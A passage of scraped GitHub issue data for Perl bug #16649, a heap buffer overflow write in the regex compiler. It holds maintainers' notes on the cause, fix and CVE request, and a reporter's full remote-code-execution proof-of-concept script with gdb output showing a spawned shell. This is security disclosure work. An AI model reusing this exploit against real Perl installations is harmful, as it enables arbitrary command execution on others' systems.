GMT+09​:00 Karl Williamson via RT\u003cbr\u003e\n\u0026lt;perl5-security-report-followup@​perl.org\u003cbr\u003e\n\u0026lt;mailto​:perl5-security-report-followup@​perl.org\u0026gt;\u0026gt;​:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Resending this as it did not make it to the list\u0026amp;#8203;:\n\nOn 
Wed\\, 15 Aug 2018 11\u0026amp;#8203;:01\u0026amp;#8203;:24 \\-0700\\, khw wrote\u0026amp;#8203;:\n \u0026gt; I suspect this is a serious security issue\\.  One can position where\n \u0026gt; beyond the end of buffer gets written by adding \\\\x80's to the ones\n \u0026gt; already there\\.  But I'd be happy to be wrong about this\\.\n \u0026gt;\n \u0026gt; The cause is one branch during the parsing leaves the parse pointer\n \u0026gt; positioned one too far\\, and that causes the backslash to be skipped\n \u0026gt; during pass2\\, which causes a '\\]' to be treated as a metacharacter\n \u0026gt; instead of a literal\\.\n \u0026gt;\n \u0026gt; The fix is to remove the single line that incorrectly increments the\n \u0026gt; parse pointer\\.\n \u0026gt; I don't know that this being an experimental feature has any bearing\n \u0026gt; on it\\.\n \u0026gt;\n \u0026gt; There is another thing\\.  The minus sign in this case could have been\n \u0026gt; caught as incorrect\\.  But the same out\\-of\\-bounds writes would\noccur if\n \u0026gt; a '^' replaced the minus\\, and that would be a correct use\\.\n \u0026gt;\n \u0026gt; Karl Williamson\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode class=\"notranslate\"\u003eResending this as it did not make it to the list\u0026amp;#8203;:\n\nOn Wed\\, 15 Aug 2018 11\u0026amp;#8203;:01\u0026amp;#8203;:24 \\-0700\\, khw wrote\u0026amp;#8203;:\n \u0026gt; I suspect this is a serious security issue\\.  One can position where\n \u0026gt; beyond the end of buffer gets written by adding \\\\x80's to the ones\n \u0026gt; already there\\.  
But I'd be happy to be wrong about this\\.\n \u0026gt;\n \u0026gt; The cause is one branch during the parsing leaves the parse pointer\n \u0026gt; positioned one too far\\, and that causes the backslash to be skipped\n \u0026gt; during pass2\\, which causes a '\\]' to be treated as a metacharacter\n \u0026gt; instead of a literal\\.\n \u0026gt;\n \u0026gt; The fix is to remove the single line that incorrectly increments the\n \u0026gt; parse pointer\\.\n \u0026gt; I don't know that this being an experimental feature has any bearing\n \u0026gt; on it\\.\n \u0026gt;\n \u0026gt; There is another thing\\.  The minus sign in this case could have been\n \u0026gt; caught as incorrect\\.  But the same out\\-of\\-bounds writes would\noccur if\n \u0026gt; a '^' replaced the minus\\, and that would be a correct use\\.\n \u0026gt;\n \u0026gt; Karl Williamson\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003c/blockquote\u003e","bodyVersion":"7ec26e223466bc4509f6120c254dddeafd2a1003163b7f5278b927adbd9deac6","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097448","createdAt":"2018-08-30T06:52:16Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"n
odes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZYmanQAAqTU0NDA5NzQ0OA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097450,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1MA==","body":"### From @tonycoz\n\nOn Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e instead of a literal\\.\n\u003e \n\u003e The fix is to remove the single line that incorrectly increments the\n\u003e parse pointer\\.\n\u003e I don't know that this being an experimental feature has any bearing\n\u003e on it\\.\n\u003e \n\u003e There is another thing\\. The minus sign in this case could have been\n\u003e caught as incorrect\\. 
But the same out\\-of\\-bounds writes would occur if\n\u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\nCould you please make patches against blead/maint\\-5\\.28/maint\\-5\\.26 for this?\n\nThanks\\,\nTony","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11​:01​:24 -0700, khw wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. 
But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eCould you please make patches against blead/maint-5.28/maint-5.26 for this?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e","bodyVersion":"45d4bafcbd491fcc77ebb66f9c6dc68e9953ae78fa4e436947970e3afd8948d2","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097450","createdAt":"2018-09-20T00:28:43Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"total
Count":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZfRhAngAqTU0NDA5NzQ1MA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097451,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1MQ==","body":"### From @tonycoz\n\nOn Wed\\, 29 Aug 2018 23\u0026#8203;:52\u0026#8203;:16 \\-0700\\, public@\u0026#8203;khwilliamson\\.com wrote\u0026#8203;:\n\u003e On 08/27/2018 07\u0026#8203;:16 AM\\, Eiichi Tsukata wrote\u0026#8203;:\n\u003e \u003e The following code generates a regexp which executes arbitrary\n\u003e \u003e command\n\u003e \u003e during global destruction\\.\n\u003e \u003e It overwrites some SV pointer address to a crafted fake SV on\n\u003e \u003e overwritten heap which has the malicious svt\\_free\\(shell\\_code\\) on its\n\u003e \u003e magic vtable\\.\n\u003e \u003e\n\u003e \u003e Limitations\u0026#8203;:\n\u003e \u003e\n\u003e \u003e   \\- must set \\`execstack \\-s\\` to perl\n\u003e \u003e   \\- require address leak\\(exact address of overwritten heap\\)\n\u003e \u003e\n\u003e Shouldn't this be getting a CVE?\n\nI plan to request a CVE ID for this issue in the next couple of days\\.\n\nIf anyway has already requested an ID\\, please let me know\\.\n\nThanks\\,\nTony","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 
29 Aug 2018 23​:52​:16 -0700, public@​khwilliamson.com wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn 08/27/2018 07​:16 AM, Eiichi Tsukata wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a regexp which executes arbitrary\u003cbr\u003e\ncommand\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on\u003cbr\u003e\noverwritten heap which has the malicious svt_free(shell_code) on its\u003cbr\u003e\nmagic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations​:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e  - must set `execstack -s` to perl\u003cbr\u003e\n  - require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eShouldn't this be getting a CVE?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eI plan to request a CVE ID for this issue in the next couple of days.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf anyway has already requested an ID, please let me know.\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e","bodyVersion":"37c7d0185b15bee6f0f6fa19d0a37ed328613af53dad1ac330a58d053a6109cd","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097451","createdAt":"2018-09-24T06:41:05Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgpPW-gAqTU0NDA5NzQ1MQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097452,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","i
d":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1Mg==","body":"### From @Etsukata\n\n\u003e \u003e Limitations\u0026#8203;:\n\u003e \u003e\n\u003e \u003e \\- must set \\`execstack \\-s\\` to perl\n\nupdate\u0026#8203;: this limitation can be reduced by calling Perl\\_eval\\_sv with crafted\nsv\\_u\\.svu\\_pv\\('system sh'\\) instead of calling the shellcode on heap\\.\nBut so far\\, it still needs address leak\\(overwrite address and\nPerl\\_eval\\_sv\\(\\) address\\)\\.\n\n\\- code\n\n\\`\\`\\`\n\\#\\!/usr/bin/perl\n\n\\#\n\\# RCE exploit PoC for\n\\# \\[perl \\#133423\\] regcomp\u0026#8203;: heap\\-buffer\\-overflow write\n\\#\n\nuse strict;\nuse warnings;\n\n\\# 0xabcd =\u003e '\\\\xcd\\\\xab\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00'\nsub h2s \\{\n\u0026nbsp; my $h = shift;\n\u0026nbsp; my $sz = shift;\n\u0026nbsp; my $ret = '';\n\u0026nbsp; for \\(0\\.\\.\\($sz \\- 1\\)\\) \\{\n\u0026nbsp; $ret \\.= sprintf\\(\"\\\\\\\\x%02x\"\\, \\(\\($h \u003e\u003e \\(8 \\* $\\_\\)\\) \u0026 0xff\\)\\);\n\u0026nbsp; \\}\n\u0026nbsp; return $ret\n\\}\n\nmy $cmd = 'gdb \\-x gdbcmd \\-q \\-\\-args\n~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-e ';\nmy $prefix = '\\\\'my $r = \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\a\\]\\)\\)\\\\\\\\\\\\\\\\\\]X';\n\nmy $addr = 0xbacbfc; \\# overwrite start addr\n\u0026nbsp; \\# search with\u0026#8203;:\n\u0026nbsp; \\# \\(gdb\\) b regcomp\\.c\u0026#8203;:13904\n\u0026nbsp; \\# \\(gdb\\) p s\n\u0026nbsp; \\# \\[CAUTION\\] must not contain '\\]' \\(0x5d\\)\n\u0026nbsp; \\#\nmy $addr\\_sv\\_any = $addr \\+ 8 \\+ 4 \\+ 4 \\+ 8;\nmy $addr\\_stash = $addr\\_sv\\_any \\+ 8 \\+ 8 \\+ 8;\nmy $addr\\_stash\\_any = $addr\\_stash \\+ 8 \\+ 4 \\+ 
4;\nmy $addr\\_magic = $addr\\_stash \\+ 8 \\+ 4 \\+ 4 \\+ 8 \\+ 8 \\+ 20 \\+ 8;\nmy $addr\\_mg\\_virtual = $addr\\_magic \\+ 8 \\+ 8 \\+ 2 \\+ 1 \\+ 1 \\+ 8 \\+ 8 \\+ 8;\n\n\\# $ nm /path/to/perl | grep Perl\\_eval\\_sv\nmy $addr\\_eval\\_sv = 0x46a576;\nmy $addr\\_system\\_sh = $addr\\_stash\\_any \\+ 8 \\+ 8;\n\nmy $body = ''\n\n\\# sv\\($addr\\) obj\n\\. h2s\\($addr\\_sv\\_any\\, 8\\)\n\\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\n\\# sv\\_flags\n\\# \\- SVt\\_PVMG || SVs\\_OBJECT : to call SvREFCNT\\_dec\\_NN at\ndo\\_clean\\_named\\_objs\\(\\)\n\\# \\- SVf\\_POK || SVp\\_POK : to use as SVPV in eval\\_sv\n\\. h2s\\(0x104407\\, 4\\)\n\n\\# sv\\_u\\.svu\\_pv : ptr to \"system sh\"\n\\. h2s\\($addr\\_system\\_sh\\, 8\\)\n\n\\# any\\($addr\\_sv\\_any\\)\n\\. h2s\\($addr\\_stash\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($addr\\_magic\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\\. h2s\\(length\\(\"system sh\"\\)\\, 8\\) \\# STRLEN xpv\\_cur\n\n\\#\\# xmg\\_stash\\($addr\\_stash\\)\n\\. h2s\\($addr\\_stash\\_any\\, 8\\) \\# sv\\_any\n\\. h2s\\(0x02\\, 4\\) \\# sv\\_refcnt \\(not 0x01\u0026#8203;: SVt\\_PVHV can not\nbypass assertion in eval\\_sv\\)\n\\. h2s\\(0x0c\\, 4\\) \\# sv\\_flags \\(SVt\\_PVHV\\)\n\\#\\# any\\($addr\\_stash\\_any\\)\n\\. h2s\\(0x00\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($addr\\_magic\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\n\\# $addr\\_system\\_sh\n\\. \"system sh\\\\\\\\x00\"\n\n\\. \"A\" x 10 \\# padding\n\\. h2s\\($addr\\, 8\\) \\# OVERWRITE gvp \\(addr \\+ 100\\)\n\n\\# xmg\\_magic\\($addr\\_magic\\)\n\\. h2s\\(0x00\\, 8\\) \\# MAGIC\\* mg\\_moremagic;\n\\#\n\\. h2s\\($addr\\_mg\\_virtual\\, 8\\) \\# MGVTBL\\* mg\\_virtual /\\* pointer to magic\nfunctions \\*/\n\\#\n\\. h2s\\(0x00\\, 2\\) \\# U16 mg\\_private;\n\\. h2s\\(0x00\\, 1\\) \\# char mg\\_type;\n\\. h2s\\(0x00\\, 1\\) \\# U8 mg\\_flags;\n\\. h2s\\(0x00\\, 8\\) \\# SSize\\_t mg\\_len;\n\\. h2s\\(0x00\\, 8\\) \\# SV\\* mg\\_obj;\n\\. 
h2s\\(0x00\\, 8\\) \\# char\\* mg\\_ptr;\n\\#\n\\#\\# mg\\_virual\\($addr\\_mg\\_virtual\\)\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_get\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_set\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# U32 \\(\\*svt\\_len\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_clear\\)\\(pTHX\\_ SV \\*sv\\, MAGIC\\* mg\\);\n\\. h2s\\($addr\\_eval\\_sv\\, 8\\) \\# int \\(\\*svt\\_free\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. '\\]\\)'\n\\. \"B\" x 20 \\# control gvp allocation\n\\. '\"; qr/$r/\\\\'';\n\nmy $payload = $prefix \\. $body;\n\nprint $cmd \\. $payload \\. \"\\\\n\";\n\\`\\`\\`\n\n\\- output\n\n\\`\\`\\`\n\\[eiichi@\u0026#8203;x1 exploit\\]$ cat gdbcmd\nb regcomp\\.c\u0026#8203;:13904\nrun\nl\np s\ndis br 1\nc\n\n\\[eiichi@\u0026#8203;x1 exploit\\]$ gdb \\-x gdbcmd \\-q \\-\\-args\n~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-e 'my $r 
=\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]X\\\\x14\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x44\\\\x10\\\\x00\\\\x4c\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x2c\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x68\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x09\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x68\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00system\nsh\\\\x00AAAAAAAAAA\\\\xfc\\\\xcb\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x94\\\\xcc\\\\xba\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x76\\\\xa5\\\\x46\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\]\\)BBBBBBBBBBBBBBBBBBBB\";\nqr/$r/'\nReading symbols from\n/home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\\.\\.\\.done\\.\nBreakpoint 1 at 0x5395ed\u0026#8203;: file regcomp\\.c\\, line 13904\\.\n\\[Thread debugging using libthread\\_db enabled\\]\nUsing host libthread\\_db library \"/lib64/libthread\\_db\\.so\\.1\"\\.\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]X̺DL̺\\,̺h̺ 
\\\u003c̺\n\n\u0026nbsp; h̺system\nshAAAAAAAAAA?˺?̺v?F\\]\\)BBBBBBBBBBBBBBBBBBBB/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?x\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\a\\]\\)\\)\\\\\\]X̺DL̺\\,̺h̺ \\\u003c̺\n\n\u0026nbsp; h̺system\nshAAAAAAAAAA?˺?̺v?F\\]\\)BBBBBBBBBBBBBBBBBBBB/ at \\-e line 1\\.\n\nBreakpoint 1\\, S\\_regatom \\(pRExC\\_state=0x7fffffffcc80\\, flagp=0x7fffffffc220\\,\ndepth=4\\) at regcomp\\.c\u0026#8203;:13904\n13904 \\*\\(s\\+\\+\\) = \\(char\\) ender;\n13899 U8 \\* new\\_s = uvchr\\_to\\_utf8\\(\\(U8\\*\\)s\\,\nender\\);\n13900 added\\_len = \\(char \\*\\) new\\_s \\- s;\n13901 s = \\(char \\*\\) new\\_s;\n13902 \\}\n13903 else \\{\n13904 \\*\\(s\\+\\+\\) = \\(char\\) ender;\n13905 \\}\n13906 \\}\n13907 \\}\n13908 else if \\(LOC \u0026\u0026\nis\\_PROBLEMATIC\\_LOCALE\\_FOLD\\_cp\\(ender\\)\\) \\{\n$1 = 0xbacbfc \"\"\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, baccc0\u003e=bacc14 at \\-e line 1\\.\nDetaching after fork from child process 12813\\.\nsh\\-4\\.4$ date\n2018年 9月 24日 月曜日 19\u0026#8203;:11\u0026#8203;:34 JST\n\\`\\`\\`\n\n2018年9月24日\\(月\\) 15\u0026#8203;:41 Tony Cook via RT \\\u003c\nperl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org\u003e\u0026#8203;:\n\n\u003e On Wed\\, 29 Aug 2018 23\u0026#8203;:52\u0026#8203;:16 \\-0700\\, public@\u0026#8203;khwilliamson\\.com wrote\u0026#8203;:\n\u003e \u003e On 08/27/2018 07\u0026#8203;:16 AM\\, Eiichi Tsukata wrote\u0026#8203;:\n\u003e \u003e \u003e The following code generates a regexp which executes arbitrary\n\u003e \u003e \u003e command\n\u003e \u003e \u003e during global destruction\\.\n\u003e \u003e \u003e It overwrites some SV pointer address to a crafted fake SV on\n\u003e \u003e \u003e overwritten heap which has the malicious svt\\_free\\(shell\\_code\\) on its\n\u003e \u003e \u003e magic vtable\\.\n\u003e \u003e \u003e\n\u003e \u003e \u003e Limitations\u0026#8203;:\n\u003e \u003e 
\u003e\n\u003e \u003e \u003e \\- must set \\`execstack \\-s\\` to perl\n\u003e \u003e \u003e \\- require address leak\\(exact address of overwritten heap\\)\n\u003e \u003e \u003e\n\u003e \u003e Shouldn't this be getting a CVE?\n\u003e\n\u003e I plan to request a CVE ID for this issue in the next couple of days\\.\n\u003e\n\u003e If anyway has already requested an ID\\, please let me know\\.\n\u003e\n\u003e Thanks\\,\n\u003e Tony\n\u003e","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/Etsukata/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/Etsukata\"\u003e@Etsukata\u003c/a\u003e\u003c/h3\u003e\n\u003cblockquote\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eLimitations​:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- must set `execstack -s` to perl\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eupdate​: this limitation can be reduced by calling Perl_eval_sv with crafted\u003cbr\u003e\nsv_u.svu_pv('system sh') instead of calling the shellcode on heap.\u003cbr\u003e\nBut so far, it still needs address leak(overwrite address and\u003cbr\u003e\nPerl_eval_sv() address).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- code\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n#!/usr/bin/perl\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e#\u003cbr\u003e\n# RCE exploit PoC for\u003cbr\u003e\n# [perl #133423] regcomp​: heap-buffer-overflow write\u003cbr\u003e\n#\u003c/p\u003e\n\u003cp dir=\"auto\"\u003euse strict;\u003cbr\u003e\nuse warnings;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# 0xabcd =\u0026gt; 